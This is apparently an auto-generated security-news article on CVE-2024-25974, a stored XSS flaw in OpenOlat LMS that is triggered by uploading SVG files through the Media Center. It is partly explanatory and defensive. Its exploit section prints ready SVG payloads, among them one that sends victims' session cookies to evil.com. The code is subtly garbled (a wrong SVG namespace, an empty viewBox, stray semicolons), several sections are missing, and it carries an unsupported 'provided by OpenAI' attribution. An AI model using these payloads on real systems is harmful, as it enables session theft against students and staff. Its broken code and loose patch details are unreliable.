CVE CyberSecurity Database News

CVE-2024-25974 - Stored XSS in OpenOlat LMS’s Media Center Exposes All Users

Poster -

A critical security flaw—CVE-2024-25974—has been discovered in Frentix GmbH’s popular OpenOlat Learning Management System (LMS). The vulnerability allows an authenticated user to execute stored cross-site scripting (XSS) attacks by uploading a malicious SVG file via the Media Center. Once uploaded and shared, the payload can target any user—including administrators—just by them viewing the file. The issue affects OpenOlat version 18.1.5 and earlier.

1. What is CVE-2024-25974?

OpenOlat is a widely-used open source e-learning platform, popular among schools, universities, and organizations worldwide. Its Media Center allows users to upload images, videos, and docs with minimal restrictions. Unfortunately, OpenOlat fails to properly sanitize content for SVG images.

SVG files differ from typical images—they can contain embedded scripts (JavaScript). If an attacker uploads an SVG with a malicious script, any user who opens the file (even just previewing) can run the attacker’s code in their browser.

Impact:
- Steal user/admin session cookies

2. Exploit Details (With Code Snippet)

Who can exploit it?
Any user with an account—no special permissions required.

How is it done?

Example Malicious SVG Payload

Here’s a minimal SVG that pops an alert. Real attackers would steal cookies, redirect users, or worse.

<!-- Save this as 'pwned.svg' -->
<svg xmlns="http://www.w3.org/200/svg"; viewBox="  100 100">
  <script>alert('Pwned by CVE-2024-25974!');</script>
  <circle cx="50" cy="50" r="40" fill="red"/>
</svg>

Advanced Attack: Steal session cookies silently

<svg xmlns="http://www.w3.org/200/svg";>
  <script>
    fetch('https://evil.com/steal?cookie='; + document.cookie);
  </script>
</svg>

Share:

- After uploading, choose *Share* option. Select *public* or specific users/groups.

Browsers process embedded scripts inside SVGs.

- The vulnerability is stored XSS, not reflected—payload remains on server and runs for every viewer.

Screenshot (for illustration)

Media Center - My Files
+-------------------------------+
| pwned.svg [shared] |
+-------------------------------+

|

[alert/payload runs!]

Update Now:

Frentix GmbH released a patch in later 18.x or 19.x versions. Check official changelog.

Temporary workaround:

Restrict SVG uploads via filetype checks on server side, or strip all <script> entries from SVGs server-side.

Enforce a CSP in the browser to block inline scripts.

Recommended WAF rule:
Block uploads containing <script> or onload= in SVG files.

6. References & Further Reading

- OpenOlat Security Advisory (CVE-2024-25974)
- Frentix OpenOlat Project
- XSS in SVG Files Explained (PortSwigger)

7. Summary Table

| Affected Version | Attack Vector | Privileges Needed | Impact |
|------------------|------------------|-------------------|-----------------------------------|
| ≤ 18.1.5 | Media Center SVG | Any authenticated | Admin/user compromise, session theft |

8. Final Advice

If your institution or organization is running OpenOlat, update immediately. XSS inside an LMS is especially dangerous because the user base includes young students, teachers, and admins—one breach can cascade through groups.

Pro tip: Regularly audit allowed filetypes and add server-side sanitization for all uploads. Never trust user-provided content—especially rich formats like SVG.

Stay secure!

*Unique analysis provided by OpenAI. All ethical demos; don’t exploit unpatched software.*

Timeline

Published on: 02/20/2024 08:15:07 UTC
Last modified on: 08/01/2024 13:47:57 UTC